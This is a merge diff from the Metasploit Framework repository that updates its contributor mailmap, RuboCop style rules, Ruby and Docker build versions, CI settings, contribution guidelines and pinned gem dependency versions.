Merge pull request #12831 from h00die/doc_cleanup

Documentation standardization. This is the first step in standardizing the module documentation.
Land #12874 , Add rand_text* debugging support for ranges
2020-01-22 15:38:37 -06:00 · 2020-01-22 11:03:06 -06:00 · 2020-01-22 09:44:06 -06:00 · 2020-01-22 07:20:28 -06:00 · 2020-01-22 07:12:36 -06:00 · 2020-01-21 16:26:56 -06:00
1610 changed files with 238991 additions and 24727 deletions
@@ -2,6 +2,8 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.

+Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
+
 ## Verification

 List the steps needed to make sure this thing works
@@ -1,59 +1,41 @@
-acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
-asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
-bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
-bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
-bpatterson-r7 <bpatterson-r7@github> <Brian_Patterson@rapid7.com>
-bturner-r7 <bturner-r7@github>       <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>     <bwatters@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>     <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>     <dh@layereddefense.com>
-dmaloney-r7 <dmaloney-r7@github>     <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>     <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>     <Dev_Mohanty@rapid7.com>
-ecarey-r7 <ecarey-r7@github>         <e@ipwnstuff.com>
-egypt <egypt@github>                 <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                 <james_lee@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>     <jbarnett@rapid7.com>
-jhart-r7 <jhart-r7@github>           <jon_hart@rapid7.com>
-jinq102030 <jinq102030@github>       <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>       <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>       <Jeffrey_Martin@rapid7.com>
-kgray-r7 <kgray-r7@github>           <kyle_gray@rapid7.com>
-khayes-r7 <khayes-r7@github>         <Kirk_Hayes@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
-lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
-space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
-tatanus <tatanus@github>             <adam_compton@rapid7.com>
-tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>             <todb@metasploit.com>
-todb-r7 <todb-r7@github>             <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>               <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>               <wvu@cs.nmt.edu>
-wvu-r7 <wvu-r7@github>               <wvu@metasploit.com>
-wwalker-r7 <wwalker-r7@github>       <wyatt_walker@rapid7.com>
-wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
+cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
+dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
+jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
+space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>               <todb@metasploit.com>
+todb-r7 <todb-r7@github>               <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -62,10 +44,12 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
@@ -84,8 +68,13 @@ corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <pete
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
+dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
+egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
+egypt <egypt@github>                   <james_lee@rapid7.com>
 espreto <espreto@github>               <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
@@ -111,6 +100,7 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
+jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -120,9 +110,15 @@ juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
+kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -152,12 +148,16 @@ rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
+sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
 stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
+tatanus <tatanus@github>               <adam_compton@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -165,6 +165,7 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,25 +112,45 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/MethodParameterName:            
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/UnneededPercentQ:
+Style/RedundantPercentQ:
  Enabled: false

 Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignParameters:
+Layout/HashAlignment:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/ParameterAlignment:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.5.3
+2.6.5
@@ -11,9 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.8'
-  - '2.4.5'
-  - '2.5.3'
+  - '2.5.7'
+  - '2.6.5'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -41,6 +40,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -4,7 +4,7 @@ Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!  Before you get started, review our
 [Code of Conduct].  There are mutliple ways to help beyond just writing code:
 - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
 - [Report a security vulnerability in Metasploit itself] to Rapid7.
 - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
@@ -20,12 +20,15 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
-  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
-  you update your own master branch.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.
+

 ### Pull Requests

+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
@@ -33,6 +36,7 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
+* **Don't** post questions in older closed PRs.

 Pull request [PR#9966] is a good example to follow.

@@ -66,6 +70,7 @@ When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
+* **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
 [Metasploit Slack] or [#metasploit on Freenode IRC].
@@ -84,7 +89,7 @@ curve, so keep it up!
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,4 +1,4 @@
-FROM ruby:2.5.3-alpine3.7 AS builder
+FROM ruby:2.6.5-alpine3.10 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -16,7 +16,7 @@ RUN apk add --no-cache \
      bison \
      build-base \
      ruby-dev \
-      libressl-dev \
+      openssl-dev \
      readline-dev \
      sqlite-dev \
      postgresql-dev \
@@ -27,17 +27,16 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && gem install bundler \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.5.3-alpine3.7
+FROM ruby:2.6.5-alpine3.10
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -52,8 +51,11 @@ RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresq
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

-COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
-COPY --chown=root:metasploit . $APP_HOME/
+COPY --from=builder /usr/local/bundle /usr/local/bundle
+RUN chown -R root:metasploit /usr/local/bundle
+COPY . $APP_HOME/
+RUN chown -R root:metasploit $APP_HOME/
+RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml

 WORKDIR $APP_HOME
@@ -3,6 +3,8 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
@@ -1,18 +1,21 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.17.31)
+    metasploit-framework (4.17.104)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      backports
-      bcrypt
+      bcrypt (= 3.1.12)
      bcrypt_pbkdf
      bit-struct
      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
+      eventmachine
      faker
+      faraday (<= 0.17.0)
+      faye-websocket
      filesize
      jsobfu
      json
@@ -20,9 +23,9 @@ PATH
      metasploit-concern
      metasploit-credential (< 3.0.0)
      metasploit-model
-      metasploit-payloads (= 1.3.56)
+      metasploit-payloads (= 1.3.83)
      metasploit_data_models (< 3.0.0)
-      metasploit_payloads-mettle (= 0.5.0)
+      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
      nessus_rest
@@ -37,7 +40,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (= 0.20.0)
+      pg (~> 0.20)
      railties
      rb-readline
      recog
@@ -76,61 +79,65 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
-      public_suffix (>= 2.0.2, < 4.0)
+    addressable (2.7.0)
+      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.8.0)
-      activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
+    arel-helpers (2.11.0)
+      activerecord (>= 3.1.0, < 7)
+    backports (3.15.0)
    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
+    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
-    crass (1.0.4)
+    crass (1.0.6)
    diff-lcs (1.3)
-    dnsruby (1.61.2)
+    dnsruby (1.61.3)
      addressable (~> 2.5)
-    docile (1.3.1)
+    docile (1.3.2)
    ed25519 (1.2.4)
    erubis (2.7.0)
+    eventmachine (1.2.7)
    factory_girl (4.9.0)
      activesupport (>= 3.0.0)
    factory_girl_rails (4.9.0)
      factory_girl (~> 4.9.0)
      railties (>= 3.0.0)
-    faker (1.9.1)
-      i18n (>= 0.7)
-    faraday (0.15.4)
+    faker (2.2.1)
+      i18n (>= 0.8)
+    faraday (0.17.0)
      multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
@@ -138,11 +145,11 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
-    loofah (2.2.3)
+    json (2.3.0)
+    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
+    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -160,45 +167,46 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.56)
-    metasploit_data_models (2.0.16)
+    metasploit-payloads (1.3.83)
+    metasploit_data_models (2.0.17)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
      metasploit-concern
      metasploit-model
-      pg (= 0.20.0)
+      pg
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.0)
+    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
-    mini_portile2 (2.3.0)
-    minitest (5.11.3)
+    mini_portile2 (2.4.0)
+    minitest (5.14.0)
    mqtt (0.5.0)
-    msgpack (1.2.4)
-    multipart-post (2.0.0)
+    msgpack (1.3.1)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (5.0.2)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.8.5)
-      mini_portile2 (~> 2.3.0)
-    octokit (4.13.0)
+    nokogiri (1.10.7)
+      mini_portile2 (~> 2.4.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.1)
+    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.1.0)
+    pdf-reader (2.4.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.20.0)
+    pg (0.21.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.1)
      activerecord (~> 4.0)
@@ -207,8 +215,8 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.3)
-    rack (1.6.11)
+    public_suffix (4.0.3)
+    rack (1.6.12)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
@@ -217,18 +225,18 @@ GEM
      activesupport (>= 4.2.0, < 5.0)
      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.4)
-      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    rails-html-sanitizer (1.3.0)
+      loofah (~> 2.3)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (12.3.2)
+    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.1.36)
+    recog (2.3.6)
      nokogiri
-    redcarpet (3.4.0)
+    redcarpet (3.5.0)
    rex-arch (0.1.13)
      rex-text
    rex-bin_tools (0.1.6)
@@ -242,7 +250,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.19)
+    rex-exploitation (0.1.22)
      jsobfu
      metasm
      rex-arch
@@ -255,7 +263,7 @@ GEM
      rex-arch
